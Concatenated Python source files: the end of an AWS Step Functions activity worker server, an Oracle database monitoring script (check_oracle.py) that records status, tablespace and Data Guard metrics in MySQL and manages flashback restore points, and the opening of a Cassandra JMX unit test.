raise ValueError('Server.worker_class must be set to a Worker '
'subclass before creating a server instance.')
self.config = server_config
# Set the client region to the region in the arn
region = activity_region(activity_arn)
# get_activity_task uses long polling of up to 60 seconds.
# Client side socket timeout should be set to at least 65 seconds.
boto_config = BotoCoreConfig(read_timeout=70, region_name=region)
self.sf_client = boto3.client('stepfunctions', config=boto_config)
self.activity_arn = activity_arn
# Determine a server name based on hostname and pid.
host = None
try:
host = socket.gethostbyname(socket.gethostname())
except Exception:
pass
self.server_name = '{0}-{1}'.format(name, host if host is not None else os.getpid())
# Init the server before the workers are created.
self.init(server_config)
if processes is None:
processes = os.cpu_count()
logger.debug('Creating ServerManager %s with %d worker processes',
self.server_name, processes)
self.pool = Pool(processes=processes,
initializer=init_worker, initargs=(Server.worker_class,
worker_config, region,
heartbeat, loglevel),
maxtasksperchild=maxtasksperchild)
# We keep track of available workers with a semaphore. This allows
# us to only get a task from the activity queue when there is
# a worker available.
self.workers = Semaphore(processes)
self.stop_event = Event()
self.healthcheck_http_server = None
if healthcheck:
self._create_healthcheck(healthcheck)
# Handle signals for graceful shutdown
signal.signal(signal.SIGTERM, self._close_signal)
signal.signal(signal.SIGINT, self._close_signal)
def init(self, server_config):
"""Can be overridden in a subclass to initialize a server."""
pass
def run(self):
logger.debug('Run server')
# We use the local worker_ready flag here because
# get_activity_task() will sometimes return without
# a new task.
worker_ready = False
while not self.stop_event.is_set():
# We first acquire a worker and then wait for a task for it
# because we want to be able to always process a task
# immediately after we get it so we ensure a worker is ready.
if not worker_ready:
logger.debug('Acquiring worker')
self.workers.acquire() # blocks until worker available
worker_ready = True
response = self.sf_client.get_activity_task(
activityArn=self.activity_arn,
workerName=self.server_name
)
task_token = response.get('taskToken')
if task_token is not None and len(task_token) > 0:
input_str = response.get('input', '')
self.run_task(task_token, input_str)
worker_ready = False
self.stop_event.clear()
logger.debug('Server run complete')
self.pool.close()
logger.debug('Waiting for workers to finish')
self.pool.join()
logger.debug('Workers exited.')
def run_task(self, task_token, input_data):
"""Start a new task by sending message to worker process."""
logger.debug('Sending task to acquired worker')
self.pool.apply_async(run_worker_task, args=(task_token, input_data),
callback=self._task_ended)
def _task_ended(self, task_result):
"""Called once task is done, releases the worker."""
self.workers.release()
logger.debug('Released worker for task')
def _close_signal(self, signal=None, frame=None):
Thread(target=self.close, args=(), daemon=True).start()
def close(self):
"""
Signal the server run loop to stop.
"""
logger.info('Closing server. Waiting for run loop to end')
self.stop_event.set()
if self.healthcheck_http_server:
self.healthcheck_http_server.shutdown()
def _create_healthcheck(self, port):
class HealthcheckHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
health = {'status': 'ok'}
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(bytes(json.dumps(health), 'UTF-8'))
def log_message(self, format, *args):
logger.debug("Healthcheck from %s %s" % (self.address_string(), format % args))
self.healthcheck_http_server = HTTPServer(('', port), HealthcheckHTTPRequestHandler)
healthcheck_thread = Thread(target=self._run_healthcheck_thread,
name='healthcheck', args=(), daemon=True)
healthcheck_thread.start()
def _run_healthcheck_thread(self):
logger.info('Started healthcheck thread')
self.healthcheck_http_server.serve_forever()
self.healthcheck_http_server.server_close()
self.healthcheck_http_server = None
logger.info('Ended healthcheck thread')
|
check_oracle.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import string
import time
import datetime
from subprocess import Popen, PIPE
import MySQLdb
import cx_Oracle
import logging
import logging.config
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("check_oracle")
path='./include'
sys.path.insert(0,path)
import functions as func
import wl_oracle as oracle
import alert_oracle as alert
import alert_main as mail
from multiprocessing import Process
######################################################################################################
# function check_oracle
######################################################################################################
def check_oracle(host,port,dsn,username,password,server_id,tags):
url=host+':'+port+'/'+dsn
try:
        conn=cx_Oracle.connect(username,password,url, mode=cx_Oracle.SYSDBA) # obtain the connection object
except Exception, e:
logger_msg="check oracle %s : %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
try:
connect=0
func.mysql_exec("begin;",'')
sql="delete from oracle_status where server_id = %s; " %(server_id)
func.mysql_exec(sql,'')
sql="insert into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
logger.info("Generate oracle instance alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_status(server_id) # generate oracle instance alert
logger.info("Generate oracle instance alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
except Exception, e:
func.mysql_exec("rollback;",'')
logger.error(str(e).strip('\n'))
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'oracle')
try:
##func.mysql_exec('delete from oracle_redo where server_id = %s;' %(server_id),'')
#get info by v$instance
connect = 1
instance_name = oracle.get_instance(conn,'instance_name')
instance_role = oracle.get_instance(conn,'instance_role')
database_role = oracle.get_database(conn,'database_role')
db_name = oracle.get_database(conn,'name')
open_mode = oracle.get_database(conn,'open_mode')
protection_mode = oracle.get_database(conn,'protection_mode')
if database_role == 'PRIMARY':
database_role_new = 'm'
dg_stats = '-1'
dg_delay = '-1'
else:
database_role_new = 's'
#dg_stats = oracle.get_stats(conn)
#dg_delay = oracle.get_delay(conn)
dg_stats = '1'
dg_delay = '1'
instance_status = oracle.get_instance(conn,'status')
startup_time = oracle.get_instance(conn,'startup_time')
#print startup_time
#startup_time = time.strftime('%Y-%m-%d %H:%M:%S',startup_time)
#localtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
#uptime = (localtime - startup_time).seconds
#print uptime
uptime = oracle.get_instance(conn,'startup_time')
version = oracle.get_instance(conn,'version')
instance_status = oracle.get_instance(conn,'status')
instance_number = oracle.get_instance(conn,'instance_number')
database_status = oracle.get_instance(conn,'database_status')
host_name = oracle.get_instance(conn,'host_name')
archiver = oracle.get_instance(conn,'archiver')
#get info by sql count
session_total = oracle.get_sessions(conn)
session_actives = oracle.get_actives(conn)
session_waits = oracle.get_waits(conn)
#get snap_id, end_interval_time
snap_id = oracle.get_current_snap_id(conn, instance_number)
end_interval_time = oracle.get_end_interval_time(conn, instance_number)
#get info by v$parameters
parameters = oracle.get_parameters(conn)
processes = parameters['processes']
##get info by v$parameters
sysstat_0 = oracle.get_sysstat(conn)
time.sleep(1)
sysstat_1 = oracle.get_sysstat(conn)
session_logical_reads_persecond = sysstat_1['session logical reads']-sysstat_0['session logical reads']
physical_reads_persecond = sysstat_1['physical reads']-sysstat_0['physical reads']
physical_writes_persecond = sysstat_1['physical writes']-sysstat_0['physical writes']
        physical_read_io_requests_persecond = sysstat_1['physical read IO requests']-sysstat_0['physical read IO requests']
        physical_write_io_requests_persecond = sysstat_1['physical write total IO requests']-sysstat_0['physical write total IO requests']
db_block_changes_persecond = sysstat_1['db block changes']-sysstat_0['db block changes']
os_cpu_wait_time = -1
if version >= "11":
os_cpu_wait_time = sysstat_0['OS CPU Qt wait time']
logons_persecond = sysstat_1['logons cumulative']-sysstat_0['logons cumulative']
logons_current = sysstat_0['logons current']
opened_cursors_persecond = sysstat_1['opened cursors cumulative']-sysstat_0['opened cursors cumulative']
opened_cursors_current = sysstat_0['opened cursors current']
user_commits_persecond = sysstat_1['user commits']-sysstat_0['user commits']
user_rollbacks_persecond = sysstat_1['user rollbacks']-sysstat_0['user rollbacks']
user_calls_persecond = sysstat_1['user calls']-sysstat_0['user calls']
db_block_gets_persecond = sysstat_1['db block gets']-sysstat_0['db block gets']
# get flashback information
flashback_on = oracle.get_database(conn,'flashback_on')
#earliest_fbscn = oracle.get_earliest_fbscn(conn)
flashback_retention = parameters['db_flashback_retention_target']
flashback_earliest_time = oracle.get_earliest_fbtime(conn,flashback_retention)
#print "flashback_earliest_time: %s" %(flashback_earliest_time)
flashback_space_used = oracle.get_flashback_space_used(conn)
##################### insert data to mysql server#############################
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_status where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_status where server_id = %s;' %(server_id),'')
sql = "insert into oracle_status(server_id,host,port,tags,connect,db_name, instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond,flashback_on,flashback_earliest_time,flashback_space_used) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,db_name,instance_name,instance_role,instance_status,database_role,open_mode,protection_mode,host_name,database_status,startup_time,uptime,version,archiver,session_total,session_actives,session_waits,dg_stats,dg_delay,processes,session_logical_reads_persecond,physical_reads_persecond,physical_writes_persecond,physical_read_io_requests_persecond,physical_write_io_requests_persecond,db_block_changes_persecond,os_cpu_wait_time,logons_persecond,logons_current,opened_cursors_persecond,opened_cursors_current,user_commits_persecond,user_rollbacks_persecond,user_calls_persecond,db_block_gets_persecond,flashback_on,flashback_earliest_time,flashback_space_used)
func.mysql_exec(sql,param)
func.update_db_status_init(server_id,'oracle',database_role_new,version,tags)
func.mysql_exec("commit;",'')
logger.info("Generate oracle instance alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_status(server_id) # generate oracle instance alert
logger.info("Generate oracle instance alert for server: %s end." %(server_id))
#check tablespace
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_tablespace_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_tablespace where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_tablespace where server_id = %s;' %(server_id),'')
tablespace = oracle.get_tablespace(conn)
if tablespace:
for line in tablespace:
sql="insert into oracle_tablespace(server_id,host,port,tags,tablespace_name,status,management,total_size,used_size,max_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0],line[1],line[2],line[3],line[4],line[5])
func.mysql_exec(sql,param)
logger.info("Generate tablespace alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_tablespace(server_id) # generate tablespace alert
logger.info("Generate tablespace alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
else:
func.mysql_exec("rollback;",'')
#check diskgroup
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_diskgroup_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_diskgroup where server_id = %s;" %(server_id),'')
func.mysql_exec('delete from oracle_diskgroup where server_id = %s;' %(server_id),'')
diskgroup = oracle.get_diskgroup(conn)
if diskgroup:
for line in diskgroup:
sql="insert into oracle_diskgroup(server_id,host,tags,diskgroup_name,state,type,total_mb,free_mb,used_rate) values(%s,%s,%s,%s,%s,%s,%s,%s,%s)"
param=(server_id,host,tags,line[0],line[1],line[2],line[3],line[4],line[5])
func.mysql_exec(sql,param)
logger.info("Generate diskgroup alert for server: %s begin:" %(server_id))
alert.gen_alert_oracle_diskgroup(server_id) # generate diskgroup alert
logger.info("Generate diskgroup alert for server: %s end." %(server_id))
func.mysql_exec("commit;",'')
else:
func.mysql_exec("rollback;",'')
##### get redo per hour
ora_redo = oracle.get_redo_per_hour(conn)
if ora_redo:
key_time=ora_redo[0]
redo_p_h=ora_redo[1]
else:
key_time = datetime.datetime.now().strftime('%Y-%m-%d %H')+':00'
redo_p_h=0
##################### insert data to mysql server#############################
sql = "select count(1) from oracle_redo where server_id='%s' and key_time='%s'; " %(server_id,key_time)
li_count = func.mysql_single_query(sql)
if li_count == 0:
sql = "insert into oracle_redo(server_id, key_time, redo_log) values(%s,%s,%s);"
param = (server_id, key_time, redo_p_h)
func.mysql_exec(sql,param)
else:
sql = "update oracle_redo set redo_log = %s, create_time = DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') where server_id = '%s' and key_time='%s'; " %(redo_p_h,server_id,key_time)
func.mysql_exec(sql,'')
##### get db time
sql = "select count(1) from oracle_db_time where server_id='%s' and snap_id='%s'; " %(server_id,snap_id)
li_count = func.mysql_single_query(sql)
if li_count == 0:
ora_dbtime = oracle.get_db_time(conn, snap_id, instance_number)
if ora_dbtime:
end_time=ora_dbtime[1]
db_time=ora_dbtime[2]
elapsed=ora_dbtime[3]
rate=ora_dbtime[4]
if rate < 0:
rate = 0
##################### insert data to mysql server#############################
sql = "insert into oracle_db_time(server_id, snap_id, end_time, db_time, elapsed, rate) values(%s,%s,%s,%s,%s,%s);"
param = (server_id, snap_id, end_time, db_time, elapsed, rate)
func.mysql_exec(sql,param)
##### insert total session, active session into table "oracle_session" for big view
sql = "select count(1) from oracle_session where server_id='%s' and snap_id='%s'; " %(server_id,snap_id)
li_count = func.mysql_single_query(sql)
if li_count == 0:
sql = "insert into oracle_session(server_id, snap_id, end_time, total_session, active_session) values(%s,%s,%s,%s,%s);"
param = (server_id, snap_id, end_interval_time, session_total, session_actives)
func.mysql_exec(sql,param)
#check restore point
restore_point = oracle.get_restorepoint(conn, flashback_retention)
if restore_point:
func.mysql_exec("begin;",'')
func.mysql_exec('delete from oracle_flashback where server_id = %s;'%(server_id),'')
for line in restore_point:
sql="insert into oracle_flashback(server_id,host,port,tags,name) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,line[0])
func.mysql_exec(sql,param)
func.mysql_exec("commit;",'')
# auto create restore point for standby database
if database_role == 'PHYSICAL STANDBY' and flashback_on == 'YES':
logger.info("Automatic create restore point for server:" + str(server_id))
create_restore_point(conn, flashback_retention)
update_fb_retention(conn, server_id, flashback_retention)
#send mail
mail.send_alert_mail(server_id, host)
except Exception, e:
logger.error(e)
func.mysql_exec("rollback;",'')
sys.exit(1)
finally:
conn.close()
######################################################################################################
# function get_connect
######################################################################################################
def get_connect(server_id):
url = ""
host = ""
port = ""
username = ""
password = ""
tags = ""
server=func.mysql_query("select host,port,dsn,username,password,tags from db_cfg_oracle where id=%s;" %(server_id))
if server:
for row in server:
host=row[0]
port=row[1]
username=row[3]
password=row[4]
tags=row[5]
url=row[0]+':'+row[1]+'/'+row[2]
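            # e.g. (illustrative values) host '10.0.0.1', port '1521', dsn 'orcl'
            # produce the EZConnect string '10.0.0.1:1521/orcl' passed to cx_Oracle below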
if host=="":
logger.warning("get host failed, exit!")
sys.exit(1)
try:
        conn=cx_Oracle.connect(username,password,url, mode=cx_Oracle.SYSDBA) # get a SYSDBA connection object
return conn
except Exception, e:
logger_msg="check oracle %s : %s" %(url,str(e).strip('\n'))
logger.warning(logger_msg)
try:
connect=0
func.mysql_exec("begin;",'')
sql="delete from oracle_status where server_id = %s; " %(server_id)
func.mysql_exec(sql,'')
sql="insert into oracle_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
func.mysql_exec("commit;",'')
except Exception, e:
func.mysql_exec("rollback;",'')
logger.error(str(e).strip('\n'))
finally:
func.check_db_status(server_id,host,port,tags,'oracle')
######################################################################################################
# function check_dataguard
######################################################################################################
def check_dataguard(dg_id, pri_id, sta_id, is_switch):
p_id = ""
s_id = ""
p_conn = ""
s_conn = ""
if is_switch == 0:
p_id = pri_id
s_id = sta_id
else:
p_id = sta_id
s_id = pri_id
try:
p_conn = get_connect(p_id)
s_conn = get_connect(s_id)
#check dataguard status
dg_p_curr_time = ""
dg_s_curr_time = ""
func.mysql_exec("begin;",'')
func.mysql_exec("insert into oracle_dg_p_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_dg_p_status where server_id in (%s, %s);" %(pri_id, sta_id),'')
func.mysql_exec('delete from oracle_dg_p_status where server_id in (%s, %s);' %(pri_id, sta_id),'')
func.mysql_exec("insert into oracle_dg_s_status_his SELECT *,DATE_FORMAT(sysdate(),'%%Y%%m%%d%%H%%i%%s') from oracle_dg_s_status where server_id in (%s, %s);" %(pri_id, sta_id),'')
func.mysql_exec('delete from oracle_dg_s_status where server_id in (%s, %s);' %(pri_id, sta_id),'')
if p_conn:
# collect primary information
# dg_p_info = oracle.get_dg_p_info(p_conn, 1)
p_dest=func.mysql_single_query("select case when t.primary_db_id = %s then t.primary_db_dest else t.standby_db_dest end from db_cfg_oracle_dg t where t.id = %s;" %(p_id, dg_id))
if p_dest is None:
p_dest = 2
dg_p_info = oracle.get_dg_p_info_2(p_conn, p_dest)
dest_id = -1
transmit_mode = "null"
thread = -1
sequence = -1
archived_delay = -1
applied_delay = -1
current_scn = -1
if dg_p_info:
# get new check_seq
new_check_seq=func.mysql_single_query("select ifnull(max(check_seq),0)+1 from oracle_dg_p_status where server_id=%s;" %(p_id))
for line in dg_p_info:
dest_id=line[0]
transmit_mode=line[1]
thread=line[2]
sequence=line[3]
archived=line[4]
applied=line[5]
current_scn=line[6]
dg_p_curr_time=line[7]
archived_delay = oracle.get_log_archived_delay(p_conn, dest_id, thread)
applied_delay = oracle.get_log_applied_delay(p_conn, dest_id, thread)
#print thread, archived_delay, applied_delay
##################### insert data to mysql server#############################
#print dest_id, thread, sequence, archived, applied, current_scn, curr_db_time
sql = "insert into oracle_dg_p_status(server_id, check_seq, dest_id, transmit_mode, `thread#`, `sequence#`, curr_scn, curr_db_time, archived_delay, applied_delay) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (p_id, new_check_seq, dest_id, transmit_mode, thread, sequence, current_scn, dg_p_curr_time, archived_delay, applied_delay)
func.mysql_exec(sql,param)
logger.info("Gather primary database infomation for server: %s" %(p_id))
else:
logger.warning("Get no data from primary server: %s" %(p_id))
else:
##################### update data to db_status#############################
func.mysql_exec("update db_status set repl_delay=-1 where server_id = %s;" %(s_id),'')
if s_conn and p_conn:
dg_s_ms = oracle.get_dg_s_ms(s_conn)
dg_s_rate = oracle.get_dg_s_rate(s_conn)
dg_s_mrp = oracle.get_dg_s_mrp(s_conn)
dg_s_scn = oracle.get_database(s_conn, 'current_scn')
dg_s_al = oracle.get_dg_s_al(p_conn, dg_s_scn)
logger.info("Tye to get timestamp by scn(%s) from primary server %s for server %s" %(dg_s_scn, p_id, s_id))
dg_s_curr_time = oracle.get_time_by_scn(p_conn, dg_s_scn)
if dg_s_curr_time == None:
logger.info("Try to get timestamp by scn(%s) from v$restorepoint of standby server %s" %(dg_s_scn, s_id))
dg_s_curr_time = oracle.get_time_from_restorepoint(s_conn, dg_s_scn)
#logger.info("dg_s_curr_time: %s" %(dg_s_curr_time))
thread=-1
sequence=-1
block=-1
if dg_s_ms:
thread=dg_s_ms[0]
sequence=dg_s_ms[1]
block=dg_s_ms[2]
            else:
                if dg_s_al:
                    thread=dg_s_al[0]
                    sequence=dg_s_al[1]
                    block=0
dg_delay=-1
            if not dg_s_curr_time or not dg_p_curr_time:
dg_delay=-1
else:
p_time=datetime.datetime.strptime(dg_p_curr_time,'%Y-%m-%d %H:%M:%S')
s_time=datetime.datetime.strptime(dg_s_curr_time,'%Y-%m-%d %H:%M:%S')
dg_delay_days=(p_time - s_time).days
dg_delay_seconds=(p_time - s_time).seconds
dg_delay=dg_delay_days * 86400 + dg_delay_seconds
#logger.info("p_time: %s" %(p_time))
#logger.info("s_time: %s" %(s_time))
#logger.info("dg_delay_days: %s" %(dg_delay_days))
#logger.info("dg_delay_seconds: %s" %(dg_delay_seconds))
#logger.info("dg_delay: %s" %(dg_delay))
if dg_delay < 0:
dg_delay = 0
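            # Worked example (hypothetical values): p_time 2021-01-02 00:00:10 minus
            # s_time 2021-01-01 23:58:10 gives days=0, seconds=120, so dg_delay=120;
            # a standby one full day behind gives days=1, seconds=0, so dg_delay=86400.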
avg_apply_rate = -1
if dg_s_mrp==0:
avg_apply_rate=0
elif dg_s_rate:
avg_apply_rate=dg_s_rate[0]
##################### insert data to mysql server#############################
sql = "insert into oracle_dg_s_status(server_id, `thread#`, `sequence#`, `block#`, delay_mins, avg_apply_rate, curr_scn, curr_db_time, mrp_status) values(%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (s_id, thread, sequence, block, dg_delay, avg_apply_rate, dg_s_scn, dg_s_curr_time, dg_s_mrp)
func.mysql_exec(sql,param)
##################### update data to oracle_status#############################
sql = "update oracle_status set dg_stats=%s, dg_delay=%s where server_id = %s;"
param = (dg_s_mrp, dg_delay, s_id)
func.mysql_exec(sql,param)
# generate dataguard alert
logger.info("Generate dataguard alert for server: %s begin:" %(s_id))
alert.gen_alert_oracle_dg(s_id)
logger.info("Generate dataguard alert for server: %s end." %(s_id))
logger.info("Gather standby database infomation for server: %s" %(s_id))
func.mysql_exec("commit;",'')
#send mail
host = func.mysql_single_query("select host from db_cfg_oracle where id = %s;" %(s_id))
mail.send_alert_mail(s_id, host)
except Exception, e:
logger.error(e)
func.mysql_exec("rollback;",'')
finally:
if p_conn:
p_conn.close()
if s_conn:
s_conn.close()
######################################################################################################
# function create_restore_point
######################################################################################################
def create_restore_point(conn, flashback_retention):
cur = None
try:
last_restore_time = oracle.get_last_fbtime(conn)
db_time = oracle.get_sysdate(conn)
time_def = -1
        if last_restore_time != 'null':
            time_def = (datetime.datetime.strptime(db_time,'%Y%m%d%H%M%S') - datetime.datetime.strptime(last_restore_time,'%Y%m%d%H%M%S')).total_seconds()
        # create a restore point when none exists yet, or when the current database
        # time is more than 1 hour past the last restore point
        logger.info('last_restore_time: %s' %(last_restore_time))
        logger.info('db_time: %s' %(db_time))
        logger.info('time_def: %s' %(time_def))
        if last_restore_time == 'null' or time_def > 3600:
db_unique_name = oracle.get_database(conn,'db_unique_name')
cur = conn.cursor()
            try:
                # stop the MRP process before creating the restore point
                stb_redo_count = oracle.get_standby_redo_count(conn)
                #logger.info("type stb_redo_count : %s" %(type(stb_redo_count)))
                mrp_status = oracle.get_dg_s_mrp(conn)
                #logger.info('mrp_status: %s' %(mrp_status))
                if mrp_status == 1:
                    sql_text = 'alter database recover managed standby database cancel'
                    cur.execute(sql_text)
                # create the restore point
                restore_name = db_unique_name + db_time
                sql_text = 'create restore point %s' %(restore_name)
                cur.execute(sql_text)
            finally:
                # if MRP was running at the start, start it again once the restore point is created
                if mrp_status == 1:
                    if stb_redo_count == 0:
                        sql_text = 'alter database recover managed standby database disconnect from session'
                    else:
                        sql_text = 'alter database recover managed standby database using current logfile disconnect from session'
                    cur.execute(sql_text)
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function drop_expire_restore_point
######################################################################################################
def drop_expire_restore_point(host,port,dsn,username,password,server_id,tags):
    cur = None
    try:
conn = get_connect(server_id)
cur = conn.cursor()
db_time = oracle.get_sysdate(conn)
open_mode = oracle.get_database(conn,'open_mode')
stb_redo_count = oracle.get_standby_redo_count(conn)
parameters = oracle.get_parameters(conn)
flashback_retention = parameters['db_flashback_retention_target']
p_str = """select concat(username, '/', password, '@', host, ':', port, '/', dsn) from db_cfg_oracle where id=%s """ %(server_id)
p_conn_str = func.mysql_single_query(p_str)
recover_str = ""
if stb_redo_count > 0:
recover_str = "alter database recover managed standby database using current logfile disconnect from session;"
else:
recover_str = "alter database recover managed standby database disconnect from session;"
        # at 00:00 every day, drop expired restore points
        if db_time[8:10] == "00":
r_name_list = oracle.get_expire_restore_list(conn, flashback_retention)
if r_name_list:
logger.info("begin drop expire restore point for server: %s" %(server_id))
if open_mode == "MOUNTED" or open_mode == "READ WRITE":
for r_name in r_name_list:
                        sql_text = 'drop restore point %s' %(r_name[0])
                        cur.execute(sql_text)
logger.info('drop expire restore point: %s for %s' %(r_name[0], server_id))
elif open_mode == "READ ONLY" or open_mode == "READ ONLY WITH APPLY":
sqlplus = Popen(["sqlplus", "-S", p_conn_str, "as", "sysdba"], stdout=PIPE, stdin=PIPE)
sqlplus.stdin.write(bytes("shutdown immediate"+os.linesep))
sqlplus.stdin.write(bytes("startup mount"+os.linesep))
out, err = sqlplus.communicate()
logger.info(out)
logger.error(err)
try:
conn = get_connect(server_id)
cur = conn.cursor()
for r_name in r_name_list:
                            sql_text = 'drop restore point %s' %(r_name[0])
                            cur.execute(sql_text)
logger.info('drop expire restore point: %s for %s' %(r_name[0], server_id))
except Exception, e:
logger.error(e)
finally:
sqlplus = Popen(["sqlplus", "-S", p_conn_str, "as", "sysdba"], stdout=PIPE, stdin=PIPE)
sqlplus.stdin.write(bytes("alter database open;"+os.linesep))
sqlplus.stdin.write(bytes(recover_str+os.linesep))
out, err = sqlplus.communicate()
logger.info(out)
logger.error(err)
logger.info("end drop expire restore point for server: %s" %(server_id))
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function update_fb_retention
######################################################################################################
def update_fb_retention(conn, server_id, old_value):
cur = None
try:
sql = "select fb_retention from db_cfg_oracle_dg where primary_db_id=%s or standby_db_id=%s limit 1;" %(server_id,server_id)
res = func.mysql_single_query(sql)
if res:
sta_retention = res*24*60
            # if the flashback retention configured for the dg group differs from the
            # database setting, update the db_flashback_retention_target parameter
            logger.info('dg flashback retention config: %s' %(sta_retention))
            logger.info('db_flashback_retention_target: %s' %(old_value))
            if int(sta_retention) != int(old_value):
                logger.info('Update db_flashback_retention_target to %s' %(sta_retention))
                cur = conn.cursor()
                sql_text = 'alter system set db_flashback_retention_target=%s scope=both' %(sta_retention)
                cur.execute(sql_text)
except Exception, e:
logger.error(e)
finally:
if cur:
cur.close()
######################################################################################################
# function clean_invalid_db_status
######################################################################################################
def clean_invalid_db_status():
try:
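        # pattern: archive rows belonging to deleted servers into the *_his tables,
        # then purge them from the live tables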
func.mysql_exec("insert into oracle_status_his SELECT *,sysdate() from oracle_status where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_status where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("insert into oracle_tablespace_his SELECT *,sysdate() from oracle_tablespace where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_tablespace where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("insert into oracle_diskgroup_his SELECT *,sysdate() from oracle_diskgroup where server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec('delete from oracle_diskgroup where server_id not in(select id from db_cfg_oracle where is_delete = 0);','')
func.mysql_exec("delete from db_status where db_type = 'oracle' and server_id not in(select id from db_cfg_oracle where is_delete = 0);",'')
func.mysql_exec("delete from db_status where db_type = 'oracle' and host not in(select host from db_cfg_oracle where is_delete = 0);",'')
except Exception, e:
logger.error(e)
finally:
pass
######################################################################################################
# function main
######################################################################################################
def main():
#get oracle servers list
servers=func.mysql_query("select id,host,port,dsn,username,password,tags from db_cfg_oracle where is_delete=0 and monitor=1;")
logger.info("check oracle controller start.")
if servers:
func.update_check_time('oracle')
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
dsn=row[3]
username=row[4]
password=row[5]
tags=row[6]
p = Process(target = check_oracle, args = (host,port,dsn,username,password,server_id,tags))
plist.append(p)
p.start()
#time.sleep(10)
#for p in plist:
# p.terminate()
for p in plist:
p.join()
else:
logger.warning("check oracle: not found any servers")
logger.info("check oracle controller finished.")
# Clean invalid data
logger.info("Clean invalid oracle status start.")
clean_invalid_db_status()
logger.info("Clean invalid oracle status finished.")
#check for dataguard group
dg_list=func.mysql_query("select id, group_name, primary_db_id, standby_db_id, is_switch from db_cfg_oracle_dg where is_delete=0 and on_process = 0;")
logger.info("check oracle dataguard start.")
if dg_list:
plist_2 = []
for row in dg_list:
dg_id=row[0]
dg_name=row[1]
pri_id=row[2]
sta_id=row[3]
is_switch=row[4]
p2 = Process(target = check_dataguard, args = (dg_id,pri_id,sta_id,is_switch))
plist_2.append(p2)
p2.start()
for p2 in plist_2:
p2.join()
else:
logger.warning("check oracle dataguard: not found any dataguard group")
logger.info("check oracle dataguard finished.")
# drop expire restore point
logger.info("drop expire restore point start.")
if servers:
plist_3 = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
dsn=row[3]
username=row[4]
password=row[5]
tags=row[6]
p3 = Process(target = drop_expire_restore_point, args = (host,port,dsn,username,password,server_id,tags))
plist_3.append(p3)
p3.start()
for p3 in plist_3:
p3.join()
else:
logger.warning("drop expire restore point: not found any dataguard group")
logger.info("drop expire restore point finished.")
if __name__=='__main__':
main()
|
test_cassandra.py
|
# stdlib
import threading
import time
from types import ListType
import unittest
# 3p
from nose.plugins.attrib import attr
# project
from aggregator import MetricsAggregator
from dogstatsd import Server
from jmxfetch import JMXFetch
from tests.checks.common import Fixtures
STATSD_PORT = 8121
class DummyReporter(threading.Thread):
def __init__(self, metrics_aggregator):
threading.Thread.__init__(self)
        self.metrics_aggregator = metrics_aggregator
        self.interval = 10
        self.metrics = None
        self.finished = False
self.start()
def run(self):
while not self.finished:
time.sleep(self.interval)
self.flush()
def flush(self):
metrics = self.metrics_aggregator.flush()
if metrics:
self.metrics = metrics
@attr(requires='cassandra')
class JMXTestCase(unittest.TestCase):
def setUp(self):
aggregator = MetricsAggregator("test_host")
self.server = Server(aggregator, "localhost", STATSD_PORT)
self.reporter = DummyReporter(aggregator)
self.t1 = threading.Thread(target=self.server.start)
self.t1.start()
confd_path = Fixtures.directory()
self.jmx_daemon = JMXFetch(confd_path, {'dogstatsd_port': STATSD_PORT})
